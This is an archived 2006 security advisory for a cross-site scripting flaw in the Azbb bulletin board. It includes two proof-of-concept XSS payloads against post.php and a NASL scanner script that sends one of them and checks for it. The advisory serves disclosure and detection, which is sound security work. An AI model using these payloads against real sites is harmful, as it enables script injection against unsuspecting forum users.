Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11213
HistoryJan 28, 2006 - 12:00 a.m.

Azbb v1.1.00 Cross-Site Scripting

2006-01-2800:00:00
vulners.com
10

[KAPDA::#22] - Azbb v1.1.00 Cross Site Scripting

KAPDA New advisory

Vulnerable products : Azbb <= 1.1.00
Vendor: www.azbb.org
Risk: Low
Vulnerabilities: Cross Site Scripting

Date :

Found : Jan 20 2006
Vendor Contacted : Jan 21 2006
Release Date : Jan 21 2006

About :

AZbb is "a forum that was written with a primary focus on security.
AZbb does not require a database such as MySQL, PostgreSQL or MSSQL and can even be used as a blog, or a portal".

Vulnerability:

Cross_Site_Scripting (XSS,CSS):

AZ Bulletin Board is affected by a cross-site scripting vulnerability.
This issue is due to the failure of the application to properly sanitize user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed.

PoC :

1)

This flaw exists because the application does not validate the "name" variable upon submission to the post.php script via the POST method.

h**p://www.[target]/post.php name="><script>alert('XSS')</script><!–

2)[limited XSS]

h**p://www.[target]/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"

NASL :

azbb_1100_XSS.nasl

This script was written by Pedram Hayati <pi3ch at kapda dot ir>

(C) KAPDA Computer Security Science Researchers Institute

http://www.kapda.ir

This script is released under the GNU GPL v2

if(description)
{
script_version ("$Revision: 1.0 $");
name["english"] = "Azbb XSS";

script_name(english:name["english"]);

desc["english"] = "
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low";

script_description(english:desc["english"]);

summary["english"] = "Checks post.php XSS";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);

script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");

family["english"] = "CGI abuses : XSS";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

The script code starts here

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if (!get_port_state(port))exit(0);

if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);

foreach dir (cgi_dirs())
{
req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"javascript:alert()", string:r))
{
security_warning(port);
exit(0);
}
}
exit(0);

Solution :

N/A

Original Advisory :

http://kapda.ir/advisory-236.html

Credit :

Discoverd by Roozbeh Afrasiabi
roozbeh_afrasiabi {a] yahoo.com
black_death {a] kapda.ir
www.persiax.com [currently down]

NASL Script by pi3ch {a] kapda.ir
KAPDA - Institute for Computer Security Researchers
http://www.KAPDA.ir